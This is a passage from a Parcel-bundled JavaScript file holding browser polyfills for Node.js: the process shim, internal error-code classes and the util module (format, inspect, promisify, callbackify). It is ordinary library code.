    if ($cfae44f0dfdf62c0$var$queue.length === 1 && !$cfae44f0dfdf62c0$var$draining) $cfae44f0dfdf62c0$var$runTimeout($cfae44f0dfdf62c0$var$drainQueue);
};
// v8 likes predictible objects
function $cfae44f0dfdf62c0$var$Item(fun, array) {
    this.fun = fun;
    this.array = array;
}
$cfae44f0dfdf62c0$var$Item.prototype.run = function() {
    this.fun.apply(null, this.array);
};
$cfae44f0dfdf62c0$var$process.title = "browser";
$cfae44f0dfdf62c0$var$process.browser = true;
$cfae44f0dfdf62c0$var$process.env = {};
$cfae44f0dfdf62c0$var$process.argv = [];
$cfae44f0dfdf62c0$var$process.version = ""; // empty string to avoid regexp issues
$cfae44f0dfdf62c0$var$process.versions = {};
function $cfae44f0dfdf62c0$var$noop() {}
$cfae44f0dfdf62c0$var$process.on = $cfae44f0dfdf62c0$var$noop;
$cfae44f0dfdf62c0$var$process.addListener = $cfae44f0dfdf62c0$var$noop;
$cfae44f0dfdf62c0$var$process.once = $cfae44f0dfdf62c0$var$noop;
$cfae44f0dfdf62c0$var$process.off = $cfae44f0dfdf62c0$var$noop;
$cfae44f0dfdf62c0$var$process.removeListener = $cfae44f0dfdf62c0$var$noop;
$cfae44f0dfdf62c0$var$process.removeAllListeners = $cfae44f0dfdf62c0$var$noop;
$cfae44f0dfdf62c0$var$process.emit = $cfae44f0dfdf62c0$var$noop;
$cfae44f0dfdf62c0$var$process.prependListener = $cfae44f0dfdf62c0$var$noop;
$cfae44f0dfdf62c0$var$process.prependOnceListener = $cfae44f0dfdf62c0$var$noop;
$cfae44f0dfdf62c0$var$process.listeners = function(name) {
    return [];
};
$cfae44f0dfdf62c0$var$process.binding = function(name) {
    throw new Error("process.binding is not supported");
};
$cfae44f0dfdf62c0$var$process.cwd = function() {
    return "/";
};
$cfae44f0dfdf62c0$var$process.chdir = function(dir) {
    throw new Error("process.chdir is not supported");
};
$cfae44f0dfdf62c0$var$process.umask = function() {
    return 0;
};

});

parcelRequire.register("cCihK", function(module, exports) {

$parcel$export(module.exports, "codes", () => $92f737b1c63f6b54$export$e45cb6485273080e, (v) => $92f737b1c63f6b54$export$e45cb6485273080e = v);
// Currently in sync with Node.js lib/internal/errors.js
// https://github.com/nodejs/node/commit/3b044962c48fe313905877a96b5d0894a5404f6f
/* eslint node-core/documented-errors: "error" */ /* eslint node-core/alphabetize-errors: "error" */ /* eslint node-core/prefer-util-format-errors: "error" */ var $92f737b1c63f6b54$export$e45cb6485273080e;
"use strict"; // The whole point behind this internal module is to allow Node.js to no
// longer be forced to treat every error message change as a semver-major
// change. The NodeError classes here all expose a `code` property whose
// value statically and permanently identifies the error. While the error
// message may change, the code should not.
function $92f737b1c63f6b54$var$_typeof(obj) {
    if (typeof Symbol === "function" && typeof Symbol.iterator === "symbol") $92f737b1c63f6b54$var$_typeof = function _typeof(obj) {
        return typeof obj;
    };
    else $92f737b1c63f6b54$var$_typeof = function _typeof(obj) {
        return obj && typeof Symbol === "function" && obj.constructor === Symbol && obj !== Symbol.prototype ? "symbol" : typeof obj;
    };
    return $92f737b1c63f6b54$var$_typeof(obj);
}
function $92f737b1c63f6b54$var$_classCallCheck(instance, Constructor) {
    if (!(instance instanceof Constructor)) throw new TypeError("Cannot call a class as a function");
}
function $92f737b1c63f6b54$var$_possibleConstructorReturn(self, call) {
    if (call && ($92f737b1c63f6b54$var$_typeof(call) === "object" || typeof call === "function")) return call;
    return $92f737b1c63f6b54$var$_assertThisInitialized(self);
}
function $92f737b1c63f6b54$var$_assertThisInitialized(self) {
    if (self === void 0) throw new ReferenceError("this hasn't been initialised - super() hasn't been called");
    return self;
}
function $92f737b1c63f6b54$var$_getPrototypeOf(o) {
    $92f737b1c63f6b54$var$_getPrototypeOf = Object.setPrototypeOf ? Object.getPrototypeOf : function _getPrototypeOf(o) {
        return o.__proto__ || Object.getPrototypeOf(o);
    };
    return $92f737b1c63f6b54$var$_getPrototypeOf(o);
}
function $92f737b1c63f6b54$var$_inherits(subClass, superClass) {
    if (typeof superClass !== "function" && superClass !== null) throw new TypeError("Super expression must either be null or a function");
    subClass.prototype = Object.create(superClass && superClass.prototype, {
        constructor: {
            value: subClass,
            writable: true,
            configurable: true
        }
    });
    if (superClass) $92f737b1c63f6b54$var$_setPrototypeOf(subClass, superClass);
}
function $92f737b1c63f6b54$var$_setPrototypeOf(o, p) {
    $92f737b1c63f6b54$var$_setPrototypeOf = Object.setPrototypeOf || function _setPrototypeOf(o, p) {
        o.__proto__ = p;
        return o;
    };
    return $92f737b1c63f6b54$var$_setPrototypeOf(o, p);
}
var $92f737b1c63f6b54$var$codes = {}; // Lazy loaded
var $92f737b1c63f6b54$var$assert;
var $92f737b1c63f6b54$var$util;
function $92f737b1c63f6b54$var$createErrorType(code, message, Base) {
    if (!Base) Base = Error;
    function getMessage(arg1, arg2, arg3) {
        if (typeof message === "string") return message;
        else return message(arg1, arg2, arg3);
    }
    var NodeError = /*#__PURE__*/ function(_Base) {
        $92f737b1c63f6b54$var$_inherits(NodeError, _Base);
        function NodeError(arg1, arg2, arg3) {
            var _this;
            $92f737b1c63f6b54$var$_classCallCheck(this, NodeError);
            _this = $92f737b1c63f6b54$var$_possibleConstructorReturn(this, $92f737b1c63f6b54$var$_getPrototypeOf(NodeError).call(this, getMessage(arg1, arg2, arg3)));
            _this.code = code;
            return _this;
        }
        return NodeError;
    }(Base);
    $92f737b1c63f6b54$var$codes[code] = NodeError;
} // https://github.com/nodejs/node/blob/v10.8.0/lib/internal/errors.js
function $92f737b1c63f6b54$var$oneOf(expected, thing) {
    if (Array.isArray(expected)) {
        var len = expected.length;
        expected = expected.map(function(i) {
            return String(i);
        });
        if (len > 2) return "one of ".concat(thing, " ").concat(expected.slice(0, len - 1).join(", "), ", or ") + expected[len - 1];
        else if (len === 2) return "one of ".concat(thing, " ").concat(expected[0], " or ").concat(expected[1]);
        else return "of ".concat(thing, " ").concat(expected[0]);
    } else return "of ".concat(thing, " ").concat(String(expected));
} // https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/startsWith
function $92f737b1c63f6b54$var$startsWith(str, search, pos) {
    return str.substr(!pos || pos < 0 ? 0 : +pos, search.length) === search;
} // https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/endsWith
function $92f737b1c63f6b54$var$endsWith(str, search, this_len) {
    if (this_len === undefined || this_len > str.length) this_len = str.length;
    return str.substring(this_len - search.length, this_len) === search;
} // https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/includes
function $92f737b1c63f6b54$var$includes(str, search, start) {
    if (typeof start !== "number") start = 0;
    if (start + search.length > str.length) return false;
    else return str.indexOf(search, start) !== -1;
}
$92f737b1c63f6b54$var$createErrorType("ERR_AMBIGUOUS_ARGUMENT", 'The "%s" argument is ambiguous. %s', TypeError);

$92f737b1c63f6b54$var$createErrorType("ERR_INVALID_ARG_TYPE", function(name, expected, actual) {
    if ($92f737b1c63f6b54$var$assert === undefined) $92f737b1c63f6b54$var$assert = (parcelRequire("aLUwE"));
    $92f737b1c63f6b54$var$assert(typeof name === "string", "'name' must be a string"); // determiner: 'must be' or 'must not be'
    var determiner;
    if (typeof expected === "string" && $92f737b1c63f6b54$var$startsWith(expected, "not ")) {
        determiner = "must not be";
        expected = expected.replace(/^not /, "");
    } else determiner = "must be";
    var msg;
    if ($92f737b1c63f6b54$var$endsWith(name, " argument")) // For cases like 'first argument'
    msg = "The ".concat(name, " ").concat(determiner, " ").concat($92f737b1c63f6b54$var$oneOf(expected, "type"));
    else {
        var type = $92f737b1c63f6b54$var$includes(name, ".") ? "property" : "argument";
        msg = 'The "'.concat(name, '" ').concat(type, " ").concat(determiner, " ").concat($92f737b1c63f6b54$var$oneOf(expected, "type"));
    } // TODO(BridgeAR): Improve the output by showing `null` and similar.
    msg += ". Received type ".concat($92f737b1c63f6b54$var$_typeof(actual));
    return msg;
}, TypeError);

$92f737b1c63f6b54$var$createErrorType("ERR_INVALID_ARG_VALUE", function(name, value) {
    var reason = arguments.length > 2 && arguments[2] !== undefined ? arguments[2] : "is invalid";
    if ($92f737b1c63f6b54$var$util === undefined) $92f737b1c63f6b54$var$util = (parcelRequire("N7Lcz"));
    var inspected = $92f737b1c63f6b54$var$util.inspect(value);
    if (inspected.length > 128) inspected = "".concat(inspected.slice(0, 128), "...");
    return "The argument '".concat(name, "' ").concat(reason, ". Received ").concat(inspected);
}, TypeError, RangeError);
$92f737b1c63f6b54$var$createErrorType("ERR_INVALID_RETURN_VALUE", function(input, name, value) {
    var type;
    if (value && value.constructor && value.constructor.name) type = "instance of ".concat(value.constructor.name);
    else type = "type ".concat($92f737b1c63f6b54$var$_typeof(value));
    return "Expected ".concat(input, ' to be returned from the "').concat(name, '"') + " function but got ".concat(type, ".");
}, TypeError);

$92f737b1c63f6b54$var$createErrorType("ERR_MISSING_ARGS", function() {
    for(var _len = arguments.length, args = new Array(_len), _key = 0; _key < _len; _key++)args[_key] = arguments[_key];
    if ($92f737b1c63f6b54$var$assert === undefined) $92f737b1c63f6b54$var$assert = (parcelRequire("aLUwE"));
    $92f737b1c63f6b54$var$assert(args.length > 0, "At least one arg needs to be specified");
    var msg = "The ";
    var len = args.length;
    args = args.map(function(a) {
        return '"'.concat(a, '"');
    });
    switch(len){
        case 1:
            msg += "".concat(args[0], " argument");
            break;
        case 2:
            msg += "".concat(args[0], " and ").concat(args[1], " arguments");
            break;
        default:
            msg += args.slice(0, len - 1).join(", ");
            msg += ", and ".concat(args[len - 1], " arguments");
            break;
    }
    return "".concat(msg, " must be specified");
}, TypeError);
$92f737b1c63f6b54$export$e45cb6485273080e = $92f737b1c63f6b54$var$codes;

});
parcelRequire.register("N7Lcz", function(module, exports) {
// Copyright Joyent, Inc. and other Node contributors.
//
// Permission is hereby granted, free of charge, to any person obtaining a
// copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to permit
// persons to whom the Software is furnished to do so, subject to the
// following conditions:
//
// The above copyright notice and this permission notice shall be included
// in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
// NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
// DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
// OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
// USE OR OTHER DEALINGS IN THE SOFTWARE.

var $hPtJY = parcelRequire("hPtJY");
var $093a98c17cb6b6b8$var$getOwnPropertyDescriptors = Object.getOwnPropertyDescriptors || function getOwnPropertyDescriptors(obj) {
    var keys = Object.keys(obj);
    var descriptors = {};
    for(var i = 0; i < keys.length; i++)descriptors[keys[i]] = Object.getOwnPropertyDescriptor(obj, keys[i]);
    return descriptors;
};
var $093a98c17cb6b6b8$var$formatRegExp = /%[sdj%]/g;
module.exports.format = function(f) {
    if (!$093a98c17cb6b6b8$var$isString(f)) {
        var objects = [];
        for(var i = 0; i < arguments.length; i++)objects.push($093a98c17cb6b6b8$var$inspect(arguments[i]));
        return objects.join(" ");
    }
    var i = 1;
    var args = arguments;
    var len = args.length;
    var str = String(f).replace($093a98c17cb6b6b8$var$formatRegExp, function(x) {
        if (x === "%%") return "%";
        if (i >= len) return x;
        switch(x){
            case "%s":
                return String(args[i++]);
            case "%d":
                return Number(args[i++]);
            case "%j":
                try {
                    return JSON.stringify(args[i++]);
                } catch (_) {
                    return "[Circular]";
                }
            default:
                return x;
        }
    });
    for(var x = args[i]; i < len; x = args[++i])if ($093a98c17cb6b6b8$var$isNull(x) || !$093a98c17cb6b6b8$var$isObject(x)) str += " " + x;
    else str += " " + $093a98c17cb6b6b8$var$inspect(x);
    return str;
};
// Mark that a method should not be used.
// Returns a modified function which warns once by default.
// If --no-deprecation is set, then it is a no-op.
module.exports.deprecate = function(fn, msg) {
    if (typeof $hPtJY !== "undefined" && $hPtJY.noDeprecation === true) return fn;
    // Allow for deprecating things in the process of starting up.
    if (typeof $hPtJY === "undefined") return function() {
        return module.exports.deprecate(fn, msg).apply(this, arguments);
    };
    var warned = false;
    function deprecated() {
        if (!warned) {
            if ($hPtJY.throwDeprecation) throw new Error(msg);
            else if ($hPtJY.traceDeprecation) console.trace(msg);
            else console.error(msg);
            warned = true;
        }
        return fn.apply(this, arguments);
    }
    return deprecated;
};
var $093a98c17cb6b6b8$var$debugs = {};
var $093a98c17cb6b6b8$var$debugEnvRegex = /^$/;
var $093a98c17cb6b6b8$var$debugEnv;
module.exports.debuglog = function(set) {
    set = set.toUpperCase();
    if (!$093a98c17cb6b6b8$var$debugs[set]) {
        if ($093a98c17cb6b6b8$var$debugEnvRegex.test(set)) {
            var pid = $hPtJY.pid;
            $093a98c17cb6b6b8$var$debugs[set] = function() {
                var msg = module.exports.format.apply(module.exports, arguments);
                console.error("%s %d: %s", set, pid, msg);
            };
        } else $093a98c17cb6b6b8$var$debugs[set] = function() {};
    }
    return $093a98c17cb6b6b8$var$debugs[set];
};
/**
 * Echos the value of a value. Trys to print the value out
 * in the best way possible given the different types.
 *
 * @param {Object} obj The object to print out.
 * @param {Object} opts Optional options object that alters the output.
 */ /* legacy: obj, showHidden, depth, colors*/ function $093a98c17cb6b6b8$var$inspect(obj, opts) {
    // default options
    var ctx = {
        seen: [],
        stylize: $093a98c17cb6b6b8$var$stylizeNoColor
    };
    // legacy...
    if (arguments.length >= 3) ctx.depth = arguments[2];
    if (arguments.length >= 4) ctx.colors = arguments[3];
    if ($093a98c17cb6b6b8$var$isBoolean(opts)) // legacy...
    ctx.showHidden = opts;
    else if (opts) // got an "options" object
    module.exports._extend(ctx, opts);
    // set default options
    if ($093a98c17cb6b6b8$var$isUndefined(ctx.showHidden)) ctx.showHidden = false;
    if ($093a98c17cb6b6b8$var$isUndefined(ctx.depth)) ctx.depth = 2;
    if ($093a98c17cb6b6b8$var$isUndefined(ctx.colors)) ctx.colors = false;
    if ($093a98c17cb6b6b8$var$isUndefined(ctx.customInspect)) ctx.customInspect = true;
    if (ctx.colors) ctx.stylize = $093a98c17cb6b6b8$var$stylizeWithColor;
    return $093a98c17cb6b6b8$var$formatValue(ctx, obj, ctx.depth);
}
module.exports.inspect = $093a98c17cb6b6b8$var$inspect;
// http://en.wikipedia.org/wiki/ANSI_escape_code#graphics
$093a98c17cb6b6b8$var$inspect.colors = {
    "bold": [
        1,
        22
    ],
    "italic": [
        3,
        23
    ],
    "underline": [
        4,
        24
    ],
    "inverse": [
        7,
        27
    ],
    "white": [
        37,
        39
    ],
    "grey": [
        90,
        39
    ],
    "black": [
        30,
        39
    ],
    "blue": [
        34,
        39
    ],
    "cyan": [
        36,
        39
    ],
    "green": [
        32,
        39
    ],
    "magenta": [
        35,
        39
    ],
    "red": [
        31,
        39
    ],
    "yellow": [
        33,
        39
    ]
};
// Don't use 'blue' not visible on cmd.exe
$093a98c17cb6b6b8$var$inspect.styles = {
    "special": "cyan",
    "number": "yellow",
    "boolean": "yellow",
    "undefined": "grey",
    "null": "bold",
    "string": "green",
    "date": "magenta",
    // "name": intentionally not styling
    "regexp": "red"
};
function $093a98c17cb6b6b8$var$stylizeWithColor(str, styleType) {
    var style = $093a98c17cb6b6b8$var$inspect.styles[styleType];
    if (style) return "\x1b[" + $093a98c17cb6b6b8$var$inspect.colors[style][0] + "m" + str + "\x1b[" + $093a98c17cb6b6b8$var$inspect.colors[style][1] + "m";
    else return str;
}
function $093a98c17cb6b6b8$var$stylizeNoColor(str, styleType) {
    return str;
}
function $093a98c17cb6b6b8$var$arrayToHash(array) {
    var hash = {};
    array.forEach(function(val, idx) {
        hash[val] = true;
    });
    return hash;
}
function $093a98c17cb6b6b8$var$formatValue(ctx, value, recurseTimes) {
    // Provide a hook for user-specified inspect functions.
    // Check that value is an object with an inspect function on it
    if (ctx.customInspect && value && $093a98c17cb6b6b8$var$isFunction(value.inspect) && // Filter out the util module, it's inspect function is special
    value.inspect !== module.exports.inspect && // Also filter out any prototype objects using the circular check.
    !(value.constructor && value.constructor.prototype === value)) {
        var ret = value.inspect(recurseTimes, ctx);
        if (!$093a98c17cb6b6b8$var$isString(ret)) ret = $093a98c17cb6b6b8$var$formatValue(ctx, ret, recurseTimes);
        return ret;
    }
    // Primitive types cannot have properties
    var primitive = $093a98c17cb6b6b8$var$formatPrimitive(ctx, value);
    if (primitive) return primitive;
    // Look up the keys of the object.
    var keys = Object.keys(value);
    var visibleKeys = $093a98c17cb6b6b8$var$arrayToHash(keys);
    if (ctx.showHidden) keys = Object.getOwnPropertyNames(value);
    // IE doesn't make error fields non-enumerable
    // http://msdn.microsoft.com/en-us/library/ie/dww52sbt(v=vs.94).aspx
    if ($093a98c17cb6b6b8$var$isError(value) && (keys.indexOf("message") >= 0 || keys.indexOf("description") >= 0)) return $093a98c17cb6b6b8$var$formatError(value);
    // Some type of object without properties can be shortcutted.
    if (keys.length === 0) {
        if ($093a98c17cb6b6b8$var$isFunction(value)) {
            var name = value.name ? ": " + value.name : "";
            return ctx.stylize("[Function" + name + "]", "special");
        }
        if ($093a98c17cb6b6b8$var$isRegExp(value)) return ctx.stylize(RegExp.prototype.toString.call(value), "regexp");
        if ($093a98c17cb6b6b8$var$isDate(value)) return ctx.stylize(Date.prototype.toString.call(value), "date");
        if ($093a98c17cb6b6b8$var$isError(value)) return $093a98c17cb6b6b8$var$formatError(value);
    }
    var base = "", array = false, braces = [
        "{",
        "}"
    ];
    // Make Array say that they are Array
    if ($093a98c17cb6b6b8$var$isArray(value)) {
        array = true;
        braces = [
            "[",
            "]"
        ];
    }
    // Make functions say that they are functions
    if ($093a98c17cb6b6b8$var$isFunction(value)) {
        var n = value.name ? ": " + value.name : "";
        base = " [Function" + n + "]";
    }
    // Make RegExps say that they are RegExps
    if ($093a98c17cb6b6b8$var$isRegExp(value)) base = " " + RegExp.prototype.toString.call(value);
    // Make dates with properties first say the date
    if ($093a98c17cb6b6b8$var$isDate(value)) base = " " + Date.prototype.toUTCString.call(value);
    // Make error with message first say the error
    if ($093a98c17cb6b6b8$var$isError(value)) base = " " + $093a98c17cb6b6b8$var$formatError(value);
    if (keys.length === 0 && (!array || value.length == 0)) return braces[0] + base + braces[1];
    if (recurseTimes < 0) {
        if ($093a98c17cb6b6b8$var$isRegExp(value)) return ctx.stylize(RegExp.prototype.toString.call(value), "regexp");
        else return ctx.stylize("[Object]", "special");
    }
    ctx.seen.push(value);
    var output;
    if (array) output = $093a98c17cb6b6b8$var$formatArray(ctx, value, recurseTimes, visibleKeys, keys);
    else output = keys.map(function(key) {
        return $093a98c17cb6b6b8$var$formatProperty(ctx, value, recurseTimes, visibleKeys, key, array);
    });
    ctx.seen.pop();
    return $093a98c17cb6b6b8$var$reduceToSingleString(output, base, braces);
}
function $093a98c17cb6b6b8$var$formatPrimitive(ctx, value) {
    if ($093a98c17cb6b6b8$var$isUndefined(value)) return ctx.stylize("undefined", "undefined");
    if ($093a98c17cb6b6b8$var$isString(value)) {
        var simple = "'" + JSON.stringify(value).replace(/^"|"$/g, "").replace(/'/g, "\\'").replace(/\\"/g, '"') + "'";
        return ctx.stylize(simple, "string");
    }
    if ($093a98c17cb6b6b8$var$isNumber(value)) return ctx.stylize("" + value, "number");
    if ($093a98c17cb6b6b8$var$isBoolean(value)) return ctx.stylize("" + value, "boolean");
    // For some reason typeof null is "object", so special case here.
    if ($093a98c17cb6b6b8$var$isNull(value)) return ctx.stylize("null", "null");
}
function $093a98c17cb6b6b8$var$formatError(value) {
    return "[" + Error.prototype.toString.call(value) + "]";
}
function $093a98c17cb6b6b8$var$formatArray(ctx, value, recurseTimes, visibleKeys, keys) {
    var output = [];
    for(var i = 0, l = value.length; i < l; ++i)if ($093a98c17cb6b6b8$var$hasOwnProperty(value, String(i))) output.push($093a98c17cb6b6b8$var$formatProperty(ctx, value, recurseTimes, visibleKeys, String(i), true));
    else output.push("");
    keys.forEach(function(key) {
        if (!key.match(/^\d+$/)) output.push($093a98c17cb6b6b8$var$formatProperty(ctx, value, recurseTimes, visibleKeys, key, true));
    });
    return output;
}
function $093a98c17cb6b6b8$var$formatProperty(ctx, value, recurseTimes, visibleKeys, key, array) {
    var name, str, desc;
    desc = Object.getOwnPropertyDescriptor(value, key) || {
        value: value[key]
    };
    if (desc.get) {
        if (desc.set) str = ctx.stylize("[Getter/Setter]", "special");
        else str = ctx.stylize("[Getter]", "special");
    } else if (desc.set) str = ctx.stylize("[Setter]", "special");
    if (!$093a98c17cb6b6b8$var$hasOwnProperty(visibleKeys, key)) name = "[" + key + "]";
    if (!str) {
        if (ctx.seen.indexOf(desc.value) < 0) {
            if ($093a98c17cb6b6b8$var$isNull(recurseTimes)) str = $093a98c17cb6b6b8$var$formatValue(ctx, desc.value, null);
            else str = $093a98c17cb6b6b8$var$formatValue(ctx, desc.value, recurseTimes - 1);
            if (str.indexOf("\n") > -1) {
                if (array) str = str.split("\n").map(function(line) {
                    return "  " + line;
                }).join("\n").slice(2);
                else str = "\n" + str.split("\n").map(function(line) {
                    return "   " + line;
                }).join("\n");
            }
        } else str = ctx.stylize("[Circular]", "special");
    }
    if ($093a98c17cb6b6b8$var$isUndefined(name)) {
        if (array && key.match(/^\d+$/)) return str;
        name = JSON.stringify("" + key);
        if (name.match(/^"([a-zA-Z_][a-zA-Z_0-9]*)"$/)) {
            name = name.slice(1, -1);
            name = ctx.stylize(name, "name");
        } else {
            name = name.replace(/'/g, "\\'").replace(/\\"/g, '"').replace(/(^"|"$)/g, "'");
            name = ctx.stylize(name, "string");
        }
    }
    return name + ": " + str;
}
function $093a98c17cb6b6b8$var$reduceToSingleString(output, base, braces) {
    var numLinesEst = 0;
    var length = output.reduce(function(prev, cur) {
        numLinesEst++;
        if (cur.indexOf("\n") >= 0) numLinesEst++;
        return prev + cur.replace(/\u001b\[\d\d?m/g, "").length + 1;
    }, 0);
    if (length > 60) return braces[0] + (base === "" ? "" : base + "\n ") + " " + output.join(",\n  ") + " " + braces[1];
    return braces[0] + base + " " + output.join(", ") + " " + braces[1];
}

// NOTE: These type checking functions intentionally don't use `instanceof`
// because it is fragile and can be easily faked with `Object.create()`.
module.exports.types = (parcelRequire("7He6T"));
function $093a98c17cb6b6b8$var$isArray(ar) {
    return Array.isArray(ar);
}
module.exports.isArray = $093a98c17cb6b6b8$var$isArray;
function $093a98c17cb6b6b8$var$isBoolean(arg) {
    return typeof arg === "boolean";
}
module.exports.isBoolean = $093a98c17cb6b6b8$var$isBoolean;
function $093a98c17cb6b6b8$var$isNull(arg) {
    return arg === null;
}
module.exports.isNull = $093a98c17cb6b6b8$var$isNull;
function $093a98c17cb6b6b8$var$isNullOrUndefined(arg) {
    return arg == null;
}
module.exports.isNullOrUndefined = $093a98c17cb6b6b8$var$isNullOrUndefined;
function $093a98c17cb6b6b8$var$isNumber(arg) {
    return typeof arg === "number";
}
module.exports.isNumber = $093a98c17cb6b6b8$var$isNumber;
function $093a98c17cb6b6b8$var$isString(arg) {
    return typeof arg === "string";
}
module.exports.isString = $093a98c17cb6b6b8$var$isString;
function $093a98c17cb6b6b8$var$isSymbol(arg) {
    return typeof arg === "symbol";
}
module.exports.isSymbol = $093a98c17cb6b6b8$var$isSymbol;
function $093a98c17cb6b6b8$var$isUndefined(arg) {
    return arg === void 0;
}
module.exports.isUndefined = $093a98c17cb6b6b8$var$isUndefined;
function $093a98c17cb6b6b8$var$isRegExp(re) {
    return $093a98c17cb6b6b8$var$isObject(re) && $093a98c17cb6b6b8$var$objectToString(re) === "[object RegExp]";
}
module.exports.isRegExp = $093a98c17cb6b6b8$var$isRegExp;
module.exports.types.isRegExp = $093a98c17cb6b6b8$var$isRegExp;
function $093a98c17cb6b6b8$var$isObject(arg) {
    return typeof arg === "object" && arg !== null;
}
module.exports.isObject = $093a98c17cb6b6b8$var$isObject;
function $093a98c17cb6b6b8$var$isDate(d) {
    return $093a98c17cb6b6b8$var$isObject(d) && $093a98c17cb6b6b8$var$objectToString(d) === "[object Date]";
}
module.exports.isDate = $093a98c17cb6b6b8$var$isDate;
module.exports.types.isDate = $093a98c17cb6b6b8$var$isDate;
function $093a98c17cb6b6b8$var$isError(e) {
    return $093a98c17cb6b6b8$var$isObject(e) && ($093a98c17cb6b6b8$var$objectToString(e) === "[object Error]" || e instanceof Error);
}
module.exports.isError = $093a98c17cb6b6b8$var$isError;
module.exports.types.isNativeError = $093a98c17cb6b6b8$var$isError;
function $093a98c17cb6b6b8$var$isFunction(arg) {
    return typeof arg === "function";
}
module.exports.isFunction = $093a98c17cb6b6b8$var$isFunction;
function $093a98c17cb6b6b8$var$isPrimitive(arg) {
    return arg === null || typeof arg === "boolean" || typeof arg === "number" || typeof arg === "string" || typeof arg === "symbol" || // ES6 symbol
    typeof arg === "undefined";
}
module.exports.isPrimitive = $093a98c17cb6b6b8$var$isPrimitive;

module.exports.isBuffer = (parcelRequire("kotBY"));
function $093a98c17cb6b6b8$var$objectToString(o) {
    return Object.prototype.toString.call(o);
}
function $093a98c17cb6b6b8$var$pad(n) {
    return n < 10 ? "0" + n.toString(10) : n.toString(10);
}
var $093a98c17cb6b6b8$var$months = [
    "Jan",
    "Feb",
    "Mar",
    "Apr",
    "May",
    "Jun",
    "Jul",
    "Aug",
    "Sep",
    "Oct",
    "Nov",
    "Dec"
];
// 26 Feb 16:19:34
function $093a98c17cb6b6b8$var$timestamp() {
    var d = new Date();
    var time = [
        $093a98c17cb6b6b8$var$pad(d.getHours()),
        $093a98c17cb6b6b8$var$pad(d.getMinutes()),
        $093a98c17cb6b6b8$var$pad(d.getSeconds())
    ].join(":");
    return [
        d.getDate(),
        $093a98c17cb6b6b8$var$months[d.getMonth()],
        time
    ].join(" ");
}
// log is just a thin wrapper to console.log that prepends a timestamp
module.exports.log = function() {
    console.log("%s - %s", $093a98c17cb6b6b8$var$timestamp(), module.exports.format.apply(module.exports, arguments));
};

/**
 * Inherit the prototype methods from one constructor into another.
 *
 * The Function.prototype.inherits from lang.js rewritten as a standalone
 * function (not on Function.prototype). NOTE: If this file is to be loaded
 * during bootstrapping this function needs to be rewritten using some native
 * functions as prototype setup using normal JavaScript does not work as
 * expected during bootstrapping (see mirror.js in r114903).
 *
 * @param {function} ctor Constructor function which needs to inherit the
 *     prototype.
 * @param {function} superCtor Constructor function to inherit prototype from.
 */ module.exports.inherits = (parcelRequire("dlqwk"));
module.exports._extend = function(origin, add) {
    // Don't do anything if add isn't an object
    if (!add || !$093a98c17cb6b6b8$var$isObject(add)) return origin;
    var keys = Object.keys(add);
    var i = keys.length;
    while(i--)origin[keys[i]] = add[keys[i]];
    return origin;
};
function $093a98c17cb6b6b8$var$hasOwnProperty(obj, prop) {
    return Object.prototype.hasOwnProperty.call(obj, prop);
}
var $093a98c17cb6b6b8$var$kCustomPromisifiedSymbol = typeof Symbol !== "undefined" ? Symbol("util.promisify.custom") : undefined;
module.exports.promisify = function promisify(original) {
    if (typeof original !== "function") throw new TypeError('The "original" argument must be of type Function');
    if ($093a98c17cb6b6b8$var$kCustomPromisifiedSymbol && original[$093a98c17cb6b6b8$var$kCustomPromisifiedSymbol]) {
        var fn = original[$093a98c17cb6b6b8$var$kCustomPromisifiedSymbol];
        if (typeof fn !== "function") throw new TypeError('The "util.promisify.custom" argument must be of type Function');
        Object.defineProperty(fn, $093a98c17cb6b6b8$var$kCustomPromisifiedSymbol, {
            value: fn,
            enumerable: false,
            writable: false,
            configurable: true
        });
        return fn;
    }
    function fn() {
        var promiseResolve, promiseReject;
        var promise = new Promise(function(resolve, reject) {
            promiseResolve = resolve;
            promiseReject = reject;
        });
        var args = [];
        for(var i = 0; i < arguments.length; i++)args.push(arguments[i]);
        args.push(function(err, value) {
            if (err) promiseReject(err);
            else promiseResolve(value);
        });
        try {
            original.apply(this, args);
        } catch (err) {
            promiseReject(err);
        }
        return promise;
    }
    Object.setPrototypeOf(fn, Object.getPrototypeOf(original));
    if ($093a98c17cb6b6b8$var$kCustomPromisifiedSymbol) Object.defineProperty(fn, $093a98c17cb6b6b8$var$kCustomPromisifiedSymbol, {
        value: fn,
        enumerable: false,
        writable: false,
        configurable: true
    });
    return Object.defineProperties(fn, $093a98c17cb6b6b8$var$getOwnPropertyDescriptors(original));
};
module.exports.promisify.custom = $093a98c17cb6b6b8$var$kCustomPromisifiedSymbol;
function $093a98c17cb6b6b8$var$callbackifyOnRejected(reason, cb) {
    // `!reason` guard inspired by bluebird (Ref: https://goo.gl/t5IS6M).
    // Because `null` is a special error value in callbacks which means "no error
    // occurred", we error-wrap so the callback consumer can distinguish between
    // "the promise rejected with null" or "the promise fulfilled with undefined".
    if (!reason) {
        var newReason = new Error("Promise was rejected with a falsy value");
        newReason.reason = reason;
        reason = newReason;
    }
    return cb(reason);
}
function $093a98c17cb6b6b8$var$callbackify(original) {
    if (typeof original !== "function") throw new TypeError('The "original" argument must be of type Function');
    // We DO NOT return the promise as it gives the user a false sense that
    // the promise is actually somehow related to the callback's execution
    // and that the callback throwing will reject the promise.
    function callbackified() {
        var args = [];
        for(var i = 0; i < arguments.length; i++)args.push(arguments[i]);
        var maybeCb = args.pop();
        if (typeof maybeCb !== "function") throw new TypeError("The last argument must be of type Function");
        var self = this;
        var cb = function() {
            return maybeCb.apply(self, arguments);
        };
        // In true node style we process the callback on `nextTick` with all the
        // implications (stack, `uncaughtException`, `async_hooks`)
